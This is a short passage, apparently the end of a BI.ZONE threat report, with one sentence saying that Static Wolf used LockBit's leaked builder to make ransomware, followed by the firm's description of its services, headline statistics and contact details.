For example, Static Wolf leveraged LockBit’s leaked builder to create a ransomware payload.

About BI.ZONE

BI.ZONE is an expert in digital risks management that helps organizations develop their businesses safely in cyberspace. We design innovative solutions that ensure the resilience of IT infrastructures of all sizes. Our business portfolio also includes a wide range of cybersecurity services: from incident investigation and threat monitoring to secure strategy building and outsourcing of specialized functions.

See the full range of solutions on our website.

600+
protected clients
800+
investigated incidents

1,200+
completed projects
1,000+
cybersecurity experts

Contact us:

+974 3138 9949

info@bi.zone
